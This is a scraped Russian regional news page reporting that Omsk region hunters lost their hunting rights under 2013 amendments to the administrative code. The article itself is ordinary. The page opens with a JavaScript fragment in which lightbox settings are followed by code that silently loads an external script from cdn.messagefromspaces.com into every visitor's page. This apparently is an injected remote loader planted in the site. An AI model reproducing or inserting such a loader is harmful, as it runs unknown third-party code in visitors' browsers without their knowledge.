, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
30 октября, 2013 Природа

В КоАП РФ введено наказание для граждан, в виде лишение права осуществлять охоту на срок от одного года

Как сообщалось ранее, в связи с внесением изменений в ФЗ от 23.07.13 № 201 «Об охоте и о сохранении охотничьих ресурсов и о внесении изменений в отдельные законодательные акты Российской Федерации» и КоАП РФ введено наказание для граждан, в виде лишение права осуществлять охоту на срок от одного года до двух лет по ч. 1.2 ст. 8.37 КоАП РФ.

Лишиться права на охоту могут за отказ от предъявления документов: охотничий билет, разрешение на добычу охотничьих ресурсов, путевку, разрешение на хранение и ношение охотничьего оружия (огнестрельного или пневматического); за охоту вне сезона.

Как результат, с момента вступления поправок постановлениями мировых судей Азовского и Называевского районов Омской области 5 охотников лишены права осуществлять охоту сроком на один год. В настоящее время Министерством готовятся материалы на аннулирование охотничьего билета у данных охотников.

Стоит отметить, что с начала летне-осеннего сезона охоты 2013 г. выявлено 296 нарушений в сфере охоты.

Источник: Минприроды и экологии

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Природа